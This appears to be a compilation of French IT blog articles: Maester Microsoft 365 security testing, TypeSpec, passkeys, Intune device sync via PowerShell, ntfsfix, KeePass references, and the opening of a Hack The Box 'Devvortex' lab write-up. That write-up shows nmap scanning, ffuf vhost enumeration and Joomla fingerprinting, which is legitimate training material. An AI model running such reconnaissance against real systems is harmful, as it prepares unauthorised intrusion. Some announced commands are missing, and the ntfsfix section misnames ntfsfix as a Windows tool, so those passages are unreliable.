Maester est un projet communautaire créé en avril 2024 par Merill Fernando, chef de produit chez Microsoft et deux MVP Security Fabian Bader et Thomas Naunheim. C’est un outil PowerShell conçu pour vous aider à comprendre la configuration de votre tenant Microsoft 365.
Il vous permet d’avoir une vision de votre configuration par rapport aux bonnes pratiques de sécurité, et ainsi, surveiller la posture de sécurité de votre tenant Microsoft 365. Cet outil fournit un rapport, mais ne réalise aucune action de correction.
À l’heure actuelle, l’outil contient 92 vérifications de sécurité, toutes concentrées sur la partie Microsoft Entra. Ces vérifications proviennent de plusieurs sources :
Maester utilise l'API Microsoft Graph pour accéder aux informations de votre tenant Microsoft 365. Cet outil vérifie la conformité de votre configuration par rapport aux bonnes pratiques de sécurité. L’originalité de cet outil réside dans l’utilisation de Pester pour vérifier cette conformité.
Pester est un module PowerShell conçu pour les tests unitaires. Bien qu’il soit souvent utilisé pour valider des scripts ou des fonctions, son mode de fonctionnement permet à chacun d’écrire ses propres tests unitaires.
Dans le cas de Maester, Pester est employé pour s'assurer que la configuration de votre tenant Microsoft 365 correspond aux critères définis dans des fichiers. Ces fichiers, appelés fichiers detests dans la suite de l’article, permettent de réaliser des vérifications sur la conformité de votre configuration. L’appellation tests provient du fait que Pester suit une nomenclature stricte concernant les fichiers qu’ils utilisent : xxxx.Tests.ps1.
Cela permet ainsi une vérification rigoureuse et continue de la sécurité d’un tenant.
Il est important de comprendre que Maester, utilisant Pester, ne fournit pas de valeurs directes de votre tenant, mais indique plutôt si vos configurations respectent les normes établies dans les fichiers Tests.
Par exemple, au lieu de spécifier le nombre d'administrateurs globaux, Maester vous informera si la configuration est conforme aux bonnes pratiques définies dans les tests. Cette méthode peut représenter une nouvelle approche pour certains qu’il est essentiel de comprendre.
B. Installation
Maester est publié dans la PowerShell Gallery, son installation peut être réalisée en seulement deux Cmdlets :
Sur votre PC, il faut ensuite créer un dossier et installer les fichiers de tests. Dans notre cas, nous installerons les fichiers Tests dans "C:\temp", mais tout autre chemin fonctionnera.
cd c:\temp
mkdir maester-tests
cd maester-tests
Install-MaesterTests .\tests
Les fichiers de tests sont installés dans C:\Temp\maester-tests\tests.
C. Utilisation
Dans un premier temps, il faut se connecter :
Connect-Maester
Comme indiqué plus haut, Maester s’appuie sur Microsoft Graph. Si vous n’avez pas les autorisations requises, il faudra autoriser les autorisations OAuth pour l’application Microsoft Graph Command Line Tools.
Ensuite, vous pouvez exécuter les tests :
Invoke-Maester
À la fin de l'exécution des tests par Maester, un bref résumé est affiché dans la console.
Ce résumé indique les résultats des tests avec le nombre de tests réussis, échoués ou ignorés, fournissant ainsi un aperçu rapide de l'état de la configuration de sécurité de votre tenant Microsoft 365.
Un fichier de rapport HTML est aussi créé, il est stocké dans le dossier "tests-results" et s’ouvre automatiquement dans votre navigateur :
Un élément en "Passed" indique que la configuration de votre tenant respecte le test en question.
Un élément en "Failed" indique que la configuration de votre tenant ne respecte le test. Cependant, selon les contraintes de votre entreprise, il convient de statuer si c’est un réel problème, ou bien un risque accepté.
Pour chaque élément du rapport, vous retrouverez :
L’identifiant
L’URL vers la documentation Maester concernant ce test
Le résultat du test
Les détails du test qui contiennent les actions à réaliser pour passer ce test
Les catégories
Les tags
La source du fichier de test Pester
Pour la majorité des tests, il est évident de comprendre pourquoi un test échoue, comme une fonctionnalité non activée ou un nombre excessif d'utilisateurs non conformes.
Cependant, il peut être plus complexe de déterminer la cause d'un échec dans certains cas, où le problème pourrait ne pas résider dans la non-conformité, mais plutôt dans un bug au sein du code PowerShell du test lui-même. Dans ces situations, il sera nécessaire d'examiner en détail les fichiers "*.Tests.ps1" pour identifier et résoudre l'erreur.
D. Création de ses propres tests
Le gros intérêt de Maester est que ce n’est qu’un framework, c’est-à-dire qu’il peut être étendu pour correspondre à vos besoins avec des tests personnalisé.
Pour créer un test personnalisé dans Maester, vous devez suivre une certaine structure. Par exemple, nous allons créer un test pour vérifier qu'un groupe contient exactement deux membres.
Pour cela, créez un fichier nommé "Test-CustomITConnect.Tests.ps1" dans le répertoire "<chemin>\maester-tests\Custom". Pester recherche les fichiers se terminant par ".Tests.ps1" pour les exécuter comme des tests.
Dans notre cas, nous créons un fichier" Test-CustomITConnect.Tests.ps1" dans "C:\temp\maester-tests".
Pour le contenu du fichier "Test-CustomITConnect.Tests.ps1", nous devons suivre la syntaxe Pester, ce qui donne :
Describe "Test-MyGroupMembership" -Tag "Group" {
It "Check 'MyGroup1' Members" {
$groupID = "cc831d2a-6e92-4988-903c-1799de3a9aa1"
$members = Get-MgGroupMember -GroupId $groupID
# Test if the group has exactly 2 members
$members.Count | Should -BeExactly 2
}
}
Il est alors possible d’exécuter Maester avec uniquement notre test :
cd c:\temp\maester-test
Invoke-Maester .\tests\Custom\
Le rapport contient uniquement notre test personnalisé.
À noter qu’il est aussi possible de simplement exécuter "Invoke-Maester", pour exécuter tous les tests, y compris les tests personnalisés.
E. Exécution régulière
Maester peut être configuré pour surveiller en permanence la configuration de votre tenant à l'aide de service DevOps comme Azure DevOps Pipeline, GitHub Actions et Azure Automation.
Avec ces solutions, il est possible de recevoir un e-mail régulier avec les informations concernant la sécurité du tenant.
Source : maester.dev
La configuration de cette automatisation n’est pas détaillée dans cet article, mais vous pouvez retrouver toutes les informations dans la documentation de Maester.
III. Mise à jour des tests Maester
L'équipe Maester ajoute de nouveaux tests au fil du temps, il faut donc penser à mettre à jour le module et les tests de temps en temps.
Tous les tests personnalisés dans le dossier "/Custom" seront conservés.
Les fichiers de test des autres dossiers, notamment "/EIDSCA", "/Maester" et "/CISA", seront remplacés par les tests les plus récents :
IV. Contribuer à l’amélioration du produit
Maester est une solution récente et se focalise pour le moment uniquement sur les tests Microsoft Entra ID. Cependant, compte tenu de son fonctionnement et de sa flexibilité, il est tout à faire possible de créer ses propres tests et de participer à ce projet communautaire.
Pour approfondir le sujet de l'audit Microsoft 365, vous pouvez consulter cet article :
Microsoft a dévoilé TypeSpec, un nouveau langage de programmation pour le développement d'API ! Il offre une approche moderne et devrait permettre aux développeurs de créer une API plus efficacement. Faisons le point.
Pour mettre au point TypeSpec, Microsoft s'est inspiré de C# ainsi que de son son langage de programmation open source TypeScript. L'objectif étant de proposer aux développeurs un langage moderne pour la création d'API, à l'heure où elles sont de plus en plus présentes et adoptées par les entreprises.
TypeSpec prend en charge les différents formats de sérialisation, dont le YAML. Ils sont familiers à de nombreux développeurs et professionnels de l'informatique, ce qui facilitera la compréhension des fichiers de configuration. De plus, la compilation de l'API pourra être effectuée en respectant plusieurs normes : OpenAPI 3.0, JSON Schema 2020-12 et Protobuf.
Microsoft utilise déjà le langage TypeSpec en interne, notamment pour certains services Azure, mais aussi pour le développement de Microsoft Graph. "En exploitant la puissance de TypeSpec, l'équipe Microsoft Graph a révolutionné le développement d'API au sein de Microsoft. Cette collaboration a permis d'améliorer la productivité et de simplifier la personnalisation, soulignant ainsi le potentiel de TypeSpec.", peut-on lire sur le blog officiel de TypeSpec.
La firme de Redmond invite les développeurs à rejoindre la communauté TypeSpec, notamment pour qu'il y ait de l'entraide, mais aussi pour remonter d'éventuels bugs et pouvoir faire des feedbacks à Microsoft. "Vos commentaires sont précieux pour façonner l'avenir de TypeSpec", précise l'entreprise américaine.
Comment utiliser TypeSpec ?
Ce nouveau langage est pris en charge par deux applications de Microsoft : l'éditeur de code Visual Studio Code et l'IDE Visual Studio. Ceci est utile pour bénéficier de certaines fonctions dont la coloration syntaxique et l'autocomplétion.
Pour commencer à jouer avec TypeSpec, vous pouvez accéder au site officiel typespec.io, car il regroupe à la fois la documentation et un playground pour commencer à manipuler ce langage.
Les passkeys, ou clés d'accès, sont désormais prises en charge par Microsoft pour s'authentifier à son compte personnel Microsoft. De plus, la prise en charge des passkeys a été introduite au service de gestion des identités Entra ID. Faisons le point.
Au fil des mois, de plus en plus d'éditeurs et services ajoutent la prise en charge des passkeys pour l'authentification à son compte. Nous pouvons citer Google, Amazon, Apple, Proton, ou encore WhatsApp. Microsoft était déjà sur le coup, et à l'occasion de la Journée mondiale des mots de passe, l'entreprise américaine a annoncé avoir étendu la prise en charge des passkeys.
De quoi mettre de côté le traditionnel mot de passe associé à l'authentification multifacteur. Cette méthode d'authentification dite "passwordless" s'appuie sur des clés générées en local sur l'appareil. Ensuite, l'authentification s'effectue à l'aide d'un code PIN, d'une clé matérielle, du capteur d'empreinte biométrique ou de la reconnaissance faciale.
Une fois configurée sur votre compte Microsoft, cette méthode d'authentification pourra être utilisée pour vous connecter aux différents services de Microsoft, dont Outlook, OneDrive, Xbox Live, ou encore Copilot. Précédemment, la firme de Redmond avait ajouté la prise en charge des passkeys à son système d'exploitation Windows 11, afin que cela puisse être utilisé sur les sites web et services qui le prennent en charge.
Comment configurer une passkey sur son compte Microsoft ?
Une fois que c'est en place, vous pouvez vous authentifier grâce à cette nouvelle d'authentification comme le montre les images ci-dessous :
Source : Microsoft
En principe, une clé d'accès devrait être créée sur un appareil et ne pas être partagée d'un appareil à un autre, mais Microsoft propose la synchronisation des passkeys pour le côté pratique : "Les passkeys peuvent également être synchronisés entre vos appareils. Ainsi, si vous perdez ou mettez à jour votre appareil, vos passkeys seront prêts et vous attendront lorsque vous configurerez votre nouvel appareil.", précise Microsoft.
Par ailleurs, la documentation de Microsoft précise que les systèmes suivants sont pris en charge :
Windows 10 et versions ultérieures.
macOS Ventura et versions ultérieures.
ChromeOS 109 et versions ultérieures.
iOS 16 et versions ultérieures.
Android 9 et versions ultérieures.
Il est également précisé que les clés de sécurité matérielles qui prennent en charge le protocole FIDO2 sont supportées.
La prise en charge des passkeys dans Microsoft Entra ID
Pour les utilisateurs professionnels, Microsoft a ajouté la prise en charge des passkeys à son service Entra ID (Azure AD) en s'appuyant sur son application Microsoft Authenticator, disponible sur Android et iOS. Là encore, Microsoft propose d'utiliser des passkeys synchronisées ou liées à l'appareil.
Dans ce tutoriel, nous allons apprendre à synchroniser manuellement un appareil Windows inscrit dans Microsoft Intune. Cette manipulation peut s'avérer utile si vous venez de créer une nouvelle stratégie sur Intune et que vous souhaitez vérifier son bon fonctionnement, sans avoir à attendre. Ceci peut être pratique également en phase de dépannage sur un appareil Windows (stratégie non redescendue, stratégie en erreur, etc.).
Si vous avez l'habitude de travailler avec un Active Directory et les stratégies de groupe, vous recherchez surement un équivalent à la célèbre commande "gpupdate". À l'heure actuelle, cette commande n'existe pas pour Intune, à moins d'utiliser PowerShell mais cela implique de s'appuyer sur le module Microsoft Graph.
Dans cet article, nous allons étudier différentes possibilités, que ce soit depuis l'appareil à synchroniser en lui-même ou à partir du Centre d'administration Intune. Ceci nous donnera aussi l'occasion d'évoquer les cycles de synchronisation par défaut d'Intune, pour Windows et les autres OS pris en charge.
II. Les cycles de synchronisation Intune
Le cycle d'actualisation ou fréquence d'actualisation par défaut pour les appareils inscrits sur Intune, et peu importe le système d'exploitation, est de 8 heures. Cela signifie que lorsqu'une nouvelle stratégie est créée, elle peut mettre jusqu'à 8 heures à "redescendre" sur les appareils.
Voici un tableau récapitulatif :
Plateforme
Fréquence d'actualisation
Android, AOSP
Environ toutes les 8 heures
iOS/iPadOS
Environ toutes les 8 heures
macOS
Environ toutes les 8 heures
Windows 10/11
Environ toutes les 8 heures
Windows 8.1
Environ toutes les 8 heures
Néanmoins, lorsqu'un appareil vient de s'inscrire dans Intune, la fréquence d'actualisation est un peu différente. Il y aura des synchronisations rapprochées au départ, comme le montre le tableau ci-dessous.
Plateforme
Fréquence d'actualisation
Android, AOSP
Toutes les 3 minutes pendant 15 minutes, ensuite toutes les 15 minutes pendant 2 heures, et ensuite environ toutes les 8 heures.
iOS/iPadOS
Toutes les 15 minutes pendant 1 heure, et ensuite environ toutes les 8 heures.
macOS
Toutes les 15 minutes pendant 1 heure, et ensuite environ toutes les 8 heures.
Windows 10/11
Toutes les 3 minutes pendant 15 minutes, ensuite toutes les 15 minutes pendant 2 heures, et ensuite environ toutes les 8 heures.
Windows 8.1
Toutes les 3 minutes pendant 15 minutes, ensuite toutes les 15 minutes pendant 2 heures, et ensuite environ toutes les 8 heures.
Les informations présentées dans les tableaux ci-dessus sont issues de la documentation Microsoft :
Certaines actions impliquent une synchronisation "dès que possible", où Intune notifie l'appareil qu'il doit se synchroniser maintenant. Voici ce que l'on peut lire sur cette page de la documentation Microsoft : "Les appareils se connectent à Intune lorsqu'ils reçoivent une notification de connexion ou lors de la connexion programmée. Lorsque vous ciblez un appareil ou un utilisateur avec une action, Intune notifie immédiatement l'appareil pour qu'il s'enregistre et reçoive ces mises à jour. Par exemple, une notification est envoyée lorsqu'une action de verrouillage, de réinitialisation du code d'accès, d'application ou d'attribution de stratégie est exécutée."
Par ailleurs, il n'est pas à exclure qu'il y ait quelques exceptions et des cycles d'actualisation différents sur certaines fonctionnalités spécifiques d'Intune. C'est le cas avec les stratégies d'App Protection comme l'explique cette page.
III. Synchroniser un appareil Windows
Nous allons nous intéresser à différentes façons de synchroniser un appareil Windows, que ce soit depuis l'appareil en lui-même, depuis le Centre d'administration Microsoft Intune ou à l'aide de PowerShell.
A. Synchroniser à partir des paramètres de Windows
La première méthode à connaître, et que nous avons déjà évoqué dans de précédents articles, consiste à utiliser l'interface de gestion des paramètres de Windows.
Ouvrez les "Paramètres" Windows, cliquez sur "Comptes" à gauche, puis sur "Accès Professionnel ou Scolaire". Cliquez sur la flèche (mise en évidence sur l'image ci-dessous), puis sur le bouton "Info".
Une nouvelle page apparaît. Sur celle-ci, vous devez cliquer sur le bouton "Synchroniser". Ceci va permettre de déclencher une synchronisation, et il ne vous reste plus qu'à patienter le temps qu'elle soit effectuée.
B. Synchroniser à partir du Portail d'entreprise
Parmi les fonctionnalités de l'application "Portail d'entreprise" appelée également "Company Portal", il y a la possibilité de lancer une synchronisation sans passer par les paramètres du système Windows. Au sein de cette application, qui doit être au préalable installée sur l'appareil, cliquez sur le bouton des paramètres en bas à gauche (1) afin d'accéder au bouton nommé "Synchroniser" (2). Ceci est facilement accessible par un utilisateur lambda.
Une autre possibilité, c'est d'effectuer un clic droit sur "Portail d'entreprise" dans le menu Démarrer afin de cliquer sur le bouton "Synchroniser cet appareil". Le problème, c'est que cette entrée est visible seulement lorsque l'on effectue un clic droit à partir de la liste de toutes les applications (si l'application est épinglée au menu Démarrer et que l'on passe par ce raccourci, cela n'est pas proposé).
C. Synchroniser un appareil depuis le portail Intune
Désormais, nous allons basculer sur le Centre d'administration Intune puisqu'il intègre deux fonctionnalités permettant de lancer une synchronisation sur un ou plusieurs appareils.
Tout d'abord, quand vous accédez à la liste des "Appareils" et qu'ensuite, vous cliquez sur un appareil dans la liste, vous verrez apparaître un bouton nommé "Synchroniser" dans la "Vue d'ensemble". Il vous suffit de cliquer sur ce bouton.
Une fenêtre de confirmation apparaît, cliquez sur "Oui" et cela va envoyer un signal à la machine pour qu'elle se synchronise.
D. Synchroniser en masse des appareils depuis le portail Intune
Le Centre d'administration Intune vous offre aussi la possibilité d'effectuer des actions en masse sur une sélection d'appareils. La synchronisation fait partie des actions envisageables. Voici la marche à suivre :
1 - Cliquez sur "Appareils" dans le menu de gauche du portail Intune
2 - Cliquez sur "Tous les appareils".
3 - Cliquez sur le bouton "Actions d'appareil en bloc".
Un assistant va s'exécuter. Plusieurs options sont à configurer :
1 - Vous devez commencer par choisir le système d'exploitation, donc prenez "Windows".
2 - Sélectionnez le type d'appareil "Appareils physiques".
3 - Comme type d'action à exécuter, sélectionnez "Synchroniser".
Passez à l'étape suivante. Vous devrez alors cliquer sur "Sélectionner les appareils à inclure" afin de sélectionner un ou plusieurs appareils, dans la limite de 100 appareils (limite actuelle).
Ensuite, poursuivez jusqu'à la fin de la création de la tâche. Une notification au sein d'Intune vous indiquera si la tâche a été lancée, ou non.
E. Synchroniser un appareil avec PowerShell
Avec PowerShell, nous pouvons interagir avec les services Cloud de Microsoft tels qu'Azure et Intune par l'intermédiaire de Microsoft Graph. Il y a un ensemble de modules PowerShell disponibles et à utiliser en fonction des usages. Nous allons voir comment utiliser Microsoft Graph avec PowerShell pour synchroniser un appareil (puis plusieurs appareils).
Commencez par ouvrir une console PowerShell en tant qu'administrateur afin d'installer les modules Microsoft Graph. Vous pouvez tout installer, ou uniquement installer ceux dont vous avez besoin. Peut-être que vous avez déjà ces modules sur votre machine si vous avez l'habitude d'interagir avec les services Microsoft avec PowerShell.
Puis, exécutez la commande suivante pour basculer dans une console PowerShell avec la stratégie d'exécution "RemoteSigned", sinon vous allez obtenir des erreurs par la suite (si vous êtes en "Restricted", par exemple).
powershell.exe -ExecutionPolicy RemoteSigned
Installez tous les modules Microsoft Graph (alternative ci-dessous) :
Install-Module Microsoft.Graph
Si vous préférez limiter l'installation au strict minimum, installez ceci :
Le module "Microsoft.Graph.DeviceManagement" contient le cmdlet "Get-MgDeviceManagementManagedDevice" que nous allons utiliser par la suite pour récupérer des informations sur les appareils.
Le module "Microsoft.Graph.DeviceManagement.Actions" contient le cmdlet "Sync-MgDeviceManagementManagedDevice" que nous allons utiliser pour déclencher une synchronisation sur un appareil.
Ensuite, connectez-vous à Microsoft Graph avec PowerShell. Nous pourrions établir une connexion globale, mais nous allons plutôt limiter notre connexion à certains scopes correspondants à nos besoins. Ceci pour des raisons de sécurité et pour limiter les droits de la session que nous allons initier.
Suite à l'exécution de cette commande, vous êtes invités à vous authentifier auprès de votre tenant Microsoft 365. Puis, vous devez valider la demande d'autorisations émise par l'application Microsoft Graph.
Quand c'est fait, un message doit s'afficher dans la console : "Welcome to Microsoft Graph!". Il signifie en quelque sorte que vous pouvez commencer à interroger Intune à partir de PowerShell, car la connexion est établie.
Commençons par l'exécution d'une première commande qui va retourner la liste de tous vos appareils, aussi bien Windows que les autres plateformes, en retournant les propriétés "DeviceName" et "LastSyncDateTime" qui correspondent respectivement au nom de l'appareil et à sa date de dernière synchronisation. Le paramètre "-All" est important, car si vous avez beaucoup d'appareils, la liste sera incomplète s'il n'est pas précisé.
Si vous souhaitez obtenir ces informations uniquement pour les appareils Windows, vous devez ajouter un filtre sur la propriété "OperatingSystem". Il y a deux façons d'effectuer ce filtre :
Vous devez stocker le résultat du cmdlet "Get-MgDeviceManagementManagedDevice" dans une variable afin de récupérer l'ID de l'appareil à cibler. Dans l'exemple ci-dessous, nous allons ajouter un filtre basé sur l'opérateur "Contains" pour rechercher la machine "PC-ITC-02". C'est sur cette machine que nous souhaitons forcer une synchronisation.
Le résultat est stocké dans la variable "$Target". Elle contient un ensemble de propriétés au sujet de cet appareil, dont la propriété "Id" qui est requise par le cmdlet "Sync-MgDeviceManagementManagedDevice".
Ainsi, voici comment nous allons forcer la synchronisation sur cet appareil :
Cette commande ne retourne pas de résultat dans la console, mais l'ordre de synchronisation sera bien envoyé à l'appareil.
F. Synchroniser plusieurs appareils avec PowerShell
Grâce à l'utilisation de PowerShell, nous allons pouvoir cibler plusieurs appareils et créer des filtres sur-mesure.
Voici un premier exemple pour obtenir la liste de tous les appareils dont le nom commence par "PC-ITC", ce qui permettra de cibler les appareils nommés "PC-ITC-01", "PC-ITC-02", etc.
Voici un second exemple pour obtenir la liste de tous les appareils dont le nom contient la chaine de caractères "ITC" (peu importe si cela est au début, à la fin, au milieu, etc.).
Ensuite, nous pouvons stocker le résultat dans une variable et parcourir la liste d'appareils avec une boucle ForEach dans le but de déclencher une synchronisation sur chaque appareil.
$Targets = Get-MgDeviceManagementManagedDevice -Filter "Startswith(deviceName,'PC-ITC')"
ForEach ($Device in $Targets) {
try {
Sync-MgDeviceManagementManagedDevice -ManagedDeviceId $Device.id -ErrorAction Stop
Write-Host "$($device.DeviceName) - Synchronisation exécutée" -ForegroundColor Green
}
catch {
Write-Host "$($device.DeviceName) - Echec de l'opération avec l'erreur : $($_.Exception.Message)" -ForegroundColor Red
}
}
Pour chaque appareil, il y aura un retour dans la console pour indiquer si la commande "Sync-MgDeviceManagementManagedDevice" s'est exécutée correctement ou non. Attention, ceci n'indique pas réellement le résultat de la synchronisation.
PC-ITC-02 - Synchronisation exécutée
IV. Conclusion
Suite à la lecture de cet article, vous êtes capable de forcer la synchronisation d'un appareil Windows inscrit dans Intune pour qu'il récupère les dernières stratégies qui lui sont affectées !
Il y a deux autres méthodes que j'aurais pu indiquer et qui fonctionnent assez bien. La première, c'est le fait de redémarrer l'appareil Windows, mais ceci est un peu contraignant si un utilisateur travaille sur son ordinateur. La seconde, c'est le fait de redémarrer le service "IntuneManagementExtension" pour une actualisation liée aux applications et aux scripts.
Si vous rencontrez des erreurs pour monter ou accéder à une partition NTFS d’un disque dur ou d’une clé USB sur Linux, vous pouvez réparer les erreurs avec l’utilitaire ntfsfix du paquet ntfs-3g.
Dans ce tutoriel, je vous présente cet utilitaire et je vous montre comment l’utiliser à travers des exemples.
Qu’est-ce que ntfsfix
ntfsfix est un outil de réparation pour les systèmes de fichiers NTFS, généralement utilisé dans les environnements Linux. Le système de fichiers NTFS (New Technology File System) est le système de fichiers principal utilisé par les systèmes d’exploitation Microsoft Windows.
Cet outil fait partie du paquet ntfs-3g, un logiciel libre qui permet aux systèmes d’exploitation basés sur Linux de lire et d’écrire sur des systèmes de fichiers NTFS.
Les principales fonctions incluent :
Réparer des erreurs mineures : ntfsfix peut résoudre certaines erreurs mineures du système de fichiers NTFS, ce qui permet à un système Linux d’accéder correctement aux partitions NTFS.
Effacer les journaux d’erreurs : Il supprime les journaux d’erreurs marqués comme “bad” (mauvais), ce qui peut aider à résoudre certains problèmes.
Configurer pour une vérification complète par Windows : ntfsfix ne fait pas une réparation complète du système de fichiers NTFS. Au lieu de cela, il marque la partition NTFS pour une vérification par les outils de réparation natifs de Windows, tels que ntfsfix. Cela signifie qu’une fois que la partition NTFS est montée sur un système Windows, ce dernier effectuera une vérification complète du système de fichiers et pourra réparer toute erreur majeure.
Il est important de noter que ntfsfix ne doit pas être considéré comme un outil de réparation complet pour les systèmes de fichiers NTFS. Il est principalement conçu pour permettre l’accès immédiat à une partition NTFS depuis un environnement Linux, mais pour une réparation complète, il est recommandé d’utiliser les outils natifs de Windows.
Comment utiliser ntfsfix sur Linux
Sur les distributions Linux à base de Debian, Ubuntu, Mint, avec APT :
sudo apt-get install ntfs-3g
Pour les distributions Linux de type Fedora / Redhat :
Pour effectuer une simulation où ntfsfix n’écrit rien mais montre seulement ce qui aurait été fait, utilisez l’option -n ou –no-action. Remplacez /dev/sda4 par le lecteur de disque :
sudo ntfsfix -n /dev/sda4
Après cela, vous pouvez lancer la réparation sans option :
sudo ntfsfix /dev/sda4
ntfsfix dispose d’une autre option utile -b ou –clear-bad-sectors pour effacer la liste des secteurs défectueux. Cette fonctionnalité est particulièrement utile après le clonage d’un ancien disque contenant des secteurs défectueux sur un nouveau disque.
sudo ntfsfix -b /dev/sda4
De plus, ntfsfix permet d’effacer le drapeau de volume sale si le volume peut être fixé et monté. Vous pouvez invoquer cette fonctionnalité en contournant l’option -d comme indiqué.
sudo ntfsfix -d /dev/sda4
Remarque : ntfsfix ne peut réparer que certaines erreurs de partition NTFS. S’il échoue, chkdsk réussira probablement. Si Windows est installé, vous pouvez également charger Windows et exécuter son programme de vérification des disques, chkdsk.
Qui n'a jamais dupliqué des entrées KeePass ? Soit parce que l'auto-type diffère selon les applications qui utilisent un même identifiant/mot de passe, soit parce les URLs d'appel sont différentes.
Si comme moi vous utilisez le même compte sur plusieurs mires de connexion c'est un casse tête. C'est le cas avec les nombreuses URL de connexion d'Office 365, ou de façon générale dès que vous avez un Active Directory. Un seul compte pour plusieurs applications.
Avec une entrée pour chaque connexion il faut toutes les mettre à jour quand le mot de passe change. C'est fastidieux et chronophage.
Voyons comment régler ça pour tout soit dynamique : une fois le mot de passe changé dans l'entrée maître il se propage à toutes les entrées enfant de KeePass.
Le problème
Imaginons que j'utilise mon identifiant "[email protected]" avec 3 domaines/applications différents :
adminbackoffice.bm.fr
dashboard.blogm.net
sso.bm-vpn.com
On pourrait utiliser l'extension Kee pour mémoriser l'identifiant/mdp et renseigner tous les domaines... sauf qu'en pratique ça ne marche pas très bien. Les mires de connexions peuvent être exotiques et Kee aura du mal à pré-remplir les champs. Et puis on perd l'intérêt du CTRL+U qui n'ouvrira que le domaine principal de l'entrée.
En réalité cette solution est parfaite quand la même application web utilise plusieurs domaines avec un même identifiant, pas quand il s'agit d'applications différentes. Aussi quand la séquence d'auto-type est différente car on est obligé de créer une 2ème entrée.
La solution : les références
KeePass est un logiciel bourré d'options et de fonctionnalités, et répond nativement à cette problématique avec les références.
Le principe est simple : chaque champ d'une entrée contient un identifiant unique, qu'il est possible d'appeler depuis une autre entrée.
Tout d'abord il faudra créer une entrée mère avec au minimum ces 3 champs :
un mot de passe : {REF:P@I:B86EE0435A5A8E4B07D82BEA3864732A}
Il est possible de faire plein de choses dynamiques, recherche l'entrée mère par son nom, avoir un identifiant fixe et un mot de passe en provenance d'une entrée mère...
A partir du jour ou j'ai découvert les références tout s'est simplifié dans ma base KeePass. Terminé l'entrée dupliquée pour l'applicatif de déclaration RH qui utilise vos identifiants AD L'entrée existe toujours mais l'appel du mot de passe est dynamique. Quel plaisir de remplacer ces doublons par des références !
A noter que cela fonctionne aussi pour les identifiants qui sont parfois en domaine AD court (ex : MABOITE) et d'autres en domaine AD FQDN (ex : MABOITE.LOCAL). J'utilise aussi cette astuce pour avoir un autotype de mes identifiants AD qui fonctionnent avec Windows et Linux. J'ai créé une entrée dédiée pour chaque OS avec une référence vers mon entrée principale contenant mon couple d'identifiants/mdp AD. La séquence de touche est personnalisée pour chaque OS car il faut une tabulation pour passer de l'identifiant au mot de passe avec Windows, et ENTREE avec Linux en SSH.
Ainsi quand je change mon mot de passe AD toutes les entrées pointant vers cette référence sont automatiquement à jour. Pour ceux qui se posent la question, ce n'est pas plus lent, c'est totalement transparent à l'utilisation.
Je vous propose dans cet article la résolution de la machine Hack The Box Devvortex de difficulté "Facile". Cette box est accessible via cette page.
Hack The Box est une plateforme en ligne qui met à disposition des systèmes vulnérables appelées "box". Chaque système est différent et doit être attaqué en adoptant la démarche d'un cyberattaquant. L'objectif est d'y découvrir les vulnérabilités qui nous permettront de compromettre les utilisateurs du système, puis le compte root ou administrateur.
Ces exercices permettent de s’entraîner légalement sur des environnements technologiques divers (Linux, Windows, Active directory, web, etc.), peuvent être utiles pour tous ceux qui travaillent dans la cybersécurité (attaquants comme défenseurs) et sont très formateurs
Je vais ici vous détailler la marche à suivre pour arriver au bout de cette box en vous donnant autant de conseils et ressources que possible. N'hésitez pas à consulter les nombreux liens qui sont présents dans l'article.
Cette solution est publiée en accord avec les règles d'HackThebox et ne sera diffusée que lorsque la box en question sera indiquée comme "Retired".
Pour l'instant, nous ne disposons que de l'adresse IP (10.10.11.242) de notre cible, commençons par un scan réseau à l'aide de l'outil nmap pour découvrir les services exposés sur le réseau, et pourquoi pas leurs versions.
$ nmap --max-retries 1 -T4 -sS -A -v --open -p- -oA nmap-TCPFullVersion 10.10.11.242
Nmap scan report for 10.10.11.242
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Seuls deux services sont exposés sur le réseau. Nous pouvons également remarquer que l'outil nmap a été interroger le service web et que celui-ci lui a renvoyé une redirection vers http://devvortex.htb/. La commande suivante permet de l'ajouter à notre fichier /etc/hosts pour que notre système puisse le retrouver :
$ echo "10.10.11.242 devvortex.htb" |sudo tee -a /etc/hosts
Il s'agit d'un vhost (voir cet article : Les vHosts sous Apache2). Peut-être le service web en contient-il d'autres, mais comment le savoir ? Ceux-ci ne sont affichés ou indexés nulle part pour le moment. J'utilise donc une technique qui va me permettre d'énumérer les vhosts potentiels à l'aide d'un dictionnaire de mot :
La liste de mot (wordlist) utilisée ici est celle de la ressource SecLists, de Daniel Miessler. J'ai ajouté sur mon système une variable "s" qui contient le chemin d'accès vers ces listes (/usr/share/seclists) pour gagner en efficacité.
Via cette énumération de vhost, l'outil ffuf que j'utilise va effectuer des requêtes en changeant à chaque essai le sous domaine dans la requête suivante, mais en interrogeant toujours la même IP, le même service web :
GET / HTTP/1.1
host: FUZZ.devvortex.htb
En identifiant des variations dans la taille de la réponse, les codes de réponse HTTP ou le nombre de lignes/mots dans la réponse, nous pourrons identifier de nouveaux vhosts existants, car 99% des requêtes obtiendront la même réponse d'erreur, sauf pour les vhost existants. Ici, ffuf nous permet d'identifier le vhost dev.devvortex.htb. Que l'on rajoute également à notre fichier /etc/host :
echo "10.10.11.242 dev.devvortex.htb" |sudo tee -a /etc/hosts
Cela peut paraître contre-intuitif de s'intéresser à l'énumération de vhost plutôt que directement aller se renseigner sur ce que fait l'application web principale qui pourrait elle-même contenir des vulnérabilités. Néanmoins, foncer tête baissée sur la première brèche potentielle ou service croisé est un piège qu'il faut savoir éviter. Respecter une méthodologie est très important, notamment lors des phases d'énumération, afin de ne se fermer aucune porte et d'avoir encore de la matière à travailler lorsque nos premières attaques ne sont pas fructueuses.
Soyez sûr d'avoir toutes les cartes (informations) en main avant d'attaquer.
B. Exploitation d'un Joomla non à jour
Voyons à quoi ressemble ce site web en développement :
Il s'agit visiblement d'un site vitrine, dont l’apparence est plutôt commune. L'utilisation d'un CMS (Content Management System) comme WordPress, Joomla ou Drupal est très probable. Nous pouvons valider la présence de ces CMS par la présence de dossiers ou fichiers qui les caractérisent. Par exemple, le contenu du fichier robots.txt :
$ curl http://dev.devvortex.htb/robots.txt
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
